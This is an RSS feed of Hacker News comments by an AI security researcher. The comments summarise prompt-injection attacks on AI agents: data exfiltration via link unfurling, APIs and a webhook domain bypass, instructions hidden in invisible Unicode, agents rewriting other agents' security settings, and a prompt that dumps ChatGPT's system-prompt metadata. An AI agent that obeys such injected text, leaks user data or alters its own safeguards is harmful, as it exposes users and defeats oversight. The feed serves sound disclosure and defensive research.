<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Hacker News: wunderwuzzi23</title><link>https://news.ycombinator.com/user?id=wunderwuzzi23</link><description>Hacker News RSS</description><docs>https://hnrss.org/</docs><generator>hnrss v2.1.1</generator><lastBuildDate>Fri, 24 Apr 2026 11:57:26 +0000</lastBuildDate><atom:link href="https://hnrss.org/user?id=wunderwuzzi23" rel="self" type="application/rss+xml"></atom:link><item><title><![CDATA[New comment by wunderwuzzi23 in "Data exfil from agents in messaging apps"]]></title><description><![CDATA[
<p>Correct. Good to see this get more coverage.<p>Check out my research about unfurling in common messenger apps and also mitigations here:<p><a href="https://embracethered.com/blog/posts/2023/ai-injections-threats-context-matters/" rel="nofollow">https://embracethered.com/blog/posts/2023/ai-injections-thre...</a><p>And here "dangers of unfurling and what to do about it"<p><a href="https://embracethered.com/blog/posts/2024/the-dangers-of-unfurling-and-what-you-can-do-about-it/" rel="nofollow">https://embracethered.com/blog/posts/2024/the-dangers-of-unf...</a></p>
]]></description><pubDate>Mon, 09 Feb 2026 23:33:50 +0000</pubDate><link>https://news.ycombinator.com/item?id=46953165</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46953165</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46953165</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "OpenAI API Logs: Unpatched data exfiltration"]]></title><description><![CDATA[
<p>Agreed.<p>In December I reported a data exfil in OpenAI Agent Builder and it was also closed as Not Applicable, so it's probably still there.<p>It's also unclear if anyone from OpenAI even ever saw the report. I don't know.<p>Maybe the incentives are off on some bug bounty platforms or programs, and triagers are evaluated on how fast they respond, and how quickly a ticket is closed rather then what kind of quality tickets they help produce.<p>It's the only explanation I have for this kind of decisions.</p>
]]></description><pubDate>Thu, 22 Jan 2026 01:07:30 +0000</pubDate><link>https://news.ycombinator.com/item?id=46713893</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46713893</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46713893</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "First impressions of Claude Cowork"]]></title><description><![CDATA[
<p>Claude (generally, even non Cowork mode) is vulnerable to exfil via their APIs, and Anthropic's response was that you should click the stop button if exfiltration occurs.<p>This is a good example of the Normalization of Deviance in AI by the way.<p>See my Claude Pirate research from last October for details:<p><a href="https://embracethered.com/blog/posts/2025/claude-abusing-network-access-and-anthropic-api-for-data-exfiltration/" rel="nofollow">https://embracethered.com/blog/posts/2025/claude-abusing-net...</a></p>
]]></description><pubDate>Fri, 16 Jan 2026 00:44:08 +0000</pubDate><link>https://news.ycombinator.com/item?id=46641606</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46641606</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46641606</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Claude Cowork exfiltrates files"]]></title><description><![CDATA[
<p>Relevant prior post, includes a response from Anthropic:<p><a href="https://embracethered.com/blog/posts/2025/claude-abusing-network-access-and-anthropic-api-for-data-exfiltration/" rel="nofollow">https://embracethered.com/blog/posts/2025/claude-abusing-net...</a></p>
]]></description><pubDate>Wed, 14 Jan 2026 23:52:59 +0000</pubDate><link>https://news.ycombinator.com/item?id=46625799</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46625799</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46625799</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Fahrplan – 39C3"]]></title><description><![CDATA[
<p>Excited! It's such a great event.<p>I'm currently on a plane towards Hamburg and will be speaking on Day 2.<p>"Agentic ProbLLMs - Exploiting AI Computer-Use and Coding Agents"<p><a href="https://events.ccc.de/congress/2025/hub/event/detail/agentic-probllms-exploiting-ai-computer-use-and-coding-agents" rel="nofollow">https://events.ccc.de/congress/2025/hub/event/detail/agentic...</a></p>
]]></description><pubDate>Fri, 26 Dec 2025 10:47:07 +0000</pubDate><link>https://news.ycombinator.com/item?id=46390959</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46390959</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46390959</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "COM Like a Bomb: Rust Outlook Add-in"]]></title><description><![CDATA[
<p>In case some of you find it entertaining. When MCP came out I had a flashback to COM/DCOM days, like IDispatch and list/tools.<p>So, I built an MCP server that can host any COM server. :)<p>Now, AI can launch and work on Excel, Outlook and even resurrect Internet Explorer.<p><a href="https://embracethered.com/blog/posts/2025/mcp-com-server-automate-anything-on-windows/" rel="nofollow">https://embracethered.com/blog/posts/2025/mcp-com-server-aut...</a></p>
]]></description><pubDate>Thu, 11 Dec 2025 03:31:08 +0000</pubDate><link>https://news.ycombinator.com/item?id=46227330</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46227330</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46227330</guid></item><item><title><![CDATA[The Normalization of Deviance in AI]]></title><description><![CDATA[
<p>Article URL: <a href="https://embracethered.com/blog/posts/2025/the-normalization-of-deviance-in-ai/">https://embracethered.com/blog/posts/2025/the-normalization-of-deviance-in-ai/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=46168619">https://news.ycombinator.com/item?id=46168619</a></p>
<p>Points: 7</p>
<p># Comments: 0</p>
]]></description><pubDate>Fri, 05 Dec 2025 23:10:33 +0000</pubDate><link>https://embracethered.com/blog/posts/2025/the-normalization-of-deviance-in-ai/</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46168619</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46168619</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Google Antigravity exfiltrates data via indirect prompt injection attack"]]></title><description><![CDATA[
<p>Cool stuff. Interestingly, I responsibly disclosed that same vulnerability to Google last week (even using the same domain bypass with webhook.site).<p>For other (publicly) known issues in Antigravity, including remote command execution, see my blog post from today:<p><a href="https://embracethered.com/blog/posts/2025/security-keeps-google-antigravity-grounded/" rel="nofollow">https://embracethered.com/blog/posts/2025/security-keeps-goo...</a></p>
]]></description><pubDate>Tue, 25 Nov 2025 20:51:52 +0000</pubDate><link>https://news.ycombinator.com/item?id=46050628</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46050628</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46050628</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Google Antigravity exfiltrates data via indirect prompt injection attack"]]></title><description><![CDATA[
<p>It still is. plus there are many more issue. i documented some here: 
<a href="https://embracethered.com/blog/posts/2025/security-keeps-google-antigravity-grounded/" rel="nofollow">https://embracethered.com/blog/posts/2025/security-keeps-goo...</a></p>
]]></description><pubDate>Tue, 25 Nov 2025 20:41:09 +0000</pubDate><link>https://news.ycombinator.com/item?id=46050499</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=46050499</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=46050499</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "ChatGPT knows my IP geolocation"]]></title><description><![CDATA[
<p>The system prompt contains a lot more information about you. Just ask it to print all information under User Interaction Metadata.<p>More details here:
<a href="https://embracethered.com/blog/posts/2025/chatgpt-how-does-chat-history-memory-preferences-work/" rel="nofollow">https://embracethered.com/blog/posts/2025/chatgpt-how-does-c...</a></p>
]]></description><pubDate>Sun, 09 Nov 2025 17:06:02 +0000</pubDate><link>https://news.ycombinator.com/item?id=45867057</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45867057</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45867057</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "New prompt injection papers: Agents rule of two and the attacker moves second"]]></title><description><![CDATA[
<p>Good point. Few thoughts I would add from my perspective:<p>- The model is untrusted. Even if prompt injection is solved, we probably still would not be able to trust the model, because of possible backdoors or hallucinations. Anthropic recently showed that it takes only a few hundred documents to have trigger words trained into a model.<p>- Data Integrity. We also need to talk about data integrity and availability (full CIA triad, not not just confidentiality), e.g. private data being modified during inference. Which leads us to the third....<p>- Prompt injection which is aimed to have the AI produce output that makes humans take certain actions (not tool invocations)<p>Generally, I call the deviation from don't trust the model, the "Normalization of Deviance in AI" where seem to start trusting the model more and more over time - and I'm not sure if that is the right thing in the long term.</p>
]]></description><pubDate>Mon, 03 Nov 2025 15:13:59 +0000</pubDate><link>https://news.ycombinator.com/item?id=45799933</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45799933</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45799933</guid></item><item><title><![CDATA[Claude will send your data to crims if they ask it nicely]]></title><description><![CDATA[
<p>Article URL: <a href="https://www.theregister.com/2025/10/30/anthropics_claude_private_data/">https://www.theregister.com/2025/10/30/anthropics_claude_private_data/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=45791215">https://news.ycombinator.com/item?id=45791215</a></p>
<p>Points: 10</p>
<p># Comments: 0</p>
]]></description><pubDate>Sun, 02 Nov 2025 15:54:30 +0000</pubDate><link>https://www.theregister.com/2025/10/30/anthropics_claude_private_data/</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45791215</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45791215</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "First Self-Propagating Worm Using Invisible Code Hits OpenVSX and VS Code"]]></title><description><![CDATA[
<p>It gets even worse with LLMs and agents.<p>Many LLMs can interpret invisible Unicode Tag characters as instructions and follow them (eg invisible comment or text in a GitHub issue).<p>I wrote about this a few times, here a recent example with Google Jules:
<a href="https://embracethered.com/blog/posts/2025/google-jules-invisible-prompt-injection/" rel="nofollow">https://embracethered.com/blog/posts/2025/google-jules-invis...</a></p>
]]></description><pubDate>Mon, 20 Oct 2025 22:10:12 +0000</pubDate><link>https://news.ycombinator.com/item?id=45650069</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45650069</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45650069</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "GitHub Copilot: Remote Code Execution via Prompt Injection (CVE-2025-53773)"]]></title><description><![CDATA[
<p>Great point. It's actually possible for one agent to "help" another agent to run arbitrary code and vice versa.<p>I call it "Cross-Agent Privilege Escalation" and described in detail how such an attack might look like with Claude Code and GitHub Copilot  (<a href="https://embracethered.com/blog/posts/2025/cross-agent-privilege-escalation-agents-that-free-each-other/" rel="nofollow">https://embracethered.com/blog/posts/2025/cross-agent-privil...</a>).<p>Agents that can modify their own or other agents config and security settings is something to watch out for. It's becoming a common design weakness.<p>As more agents operate in same environment and on same data structures we will probably see more "accidents" but also possible exploits.</p>
]]></description><pubDate>Sun, 12 Oct 2025 17:59:40 +0000</pubDate><link>https://news.ycombinator.com/item?id=45560279</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45560279</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45560279</guid></item><item><title><![CDATA[Cross-Agent Privilege Escalation: When Agents Free Each Other]]></title><description><![CDATA[
<p>Article URL: <a href="https://embracethered.com/blog/posts/2025/cross-agent-privilege-escalation-agents-that-free-each-other/">https://embracethered.com/blog/posts/2025/cross-agent-privilege-escalation-agents-that-free-each-other/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=45497324">https://news.ycombinator.com/item?id=45497324</a></p>
<p>Points: 2</p>
<p># Comments: 0</p>
]]></description><pubDate>Mon, 06 Oct 2025 23:08:47 +0000</pubDate><link>https://embracethered.com/blog/posts/2025/cross-agent-privilege-escalation-agents-that-free-each-other/</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45497324</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45497324</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "From MCP to shell: MCP auth flaws enable RCE in Claude Code, Gemini CLI and more"]]></title><description><![CDATA[
<p>Thanks for sharing! I'm actually the person the Ars Technica article references. :)<p>For recent examples check out my Month of AI bugs with of a focus on coding agents at <a href="https://embracethered.com/blog/posts/2025/wrapping-up-month-of-ai-bugs/" rel="nofollow">https://embracethered.com/blog/posts/2025/wrapping-up-month-...</a><p>Lots of interesting new prompt injection exploits, from data exfil via DNS to remote code execution by having agents rewrite their own configuration settings.</p>
]]></description><pubDate>Wed, 24 Sep 2025 08:27:50 +0000</pubDate><link>https://news.ycombinator.com/item?id=45357723</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45357723</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45357723</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Gemini in Chrome"]]></title><description><![CDATA[
<p>Much longer actually, Bing Chat in Edge came out more than 2+ years ago.</p>
]]></description><pubDate>Fri, 19 Sep 2025 16:03:27 +0000</pubDate><link>https://news.ycombinator.com/item?id=45303218</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45303218</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45303218</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Claude’s memory architecture is the opposite of ChatGPT’s"]]></title><description><![CDATA[
<p>I wrote about how ChatGPT memory and also the chat history work a while ago.<p>Figured to share since it also includes prompts on how to dump the info yourself<p><a href="https://embracethered.com/blog/posts/2025/chatgpt-how-does-chat-history-memory-preferences-work/" rel="nofollow">https://embracethered.com/blog/posts/2025/chatgpt-how-does-c...</a></p>
]]></description><pubDate>Thu, 11 Sep 2025 21:30:57 +0000</pubDate><link>https://news.ycombinator.com/item?id=45216314</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45216314</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45216314</guid></item><item><title><![CDATA[Month of AI Bugs 2025]]></title><description><![CDATA[
<p>Article URL: <a href="https://monthofaibugs.com/">https://monthofaibugs.com/</a></p>
<p>Comments URL: <a href="https://news.ycombinator.com/item?id=45119625">https://news.ycombinator.com/item?id=45119625</a></p>
<p>Points: 3</p>
<p># Comments: 0</p>
]]></description><pubDate>Wed, 03 Sep 2025 19:33:54 +0000</pubDate><link>https://monthofaibugs.com/</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45119625</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45119625</guid></item><item><title><![CDATA[New comment by wunderwuzzi23 in "Comet AI browser can get prompt injected from any site, drain your bank account"]]></title><description><![CDATA[
<p>About that find command...<p>Amazon Q Developer: Remote Code Execution with Prompt Injection<p><a href="https://embracethered.com/blog/posts/2025/amazon-q-developer-remote-code-execution/" rel="nofollow">https://embracethered.com/blog/posts/2025/amazon-q-developer...</a></p>
]]></description><pubDate>Sun, 24 Aug 2025 19:45:03 +0000</pubDate><link>https://news.ycombinator.com/item?id=45007108</link><dc:creator>wunderwuzzi23</dc:creator><comments>https://news.ycombinator.com/item?id=45007108</comments><guid isPermaLink="false">https://news.ycombinator.com/item?id=45007108</guid></item></channel></rss>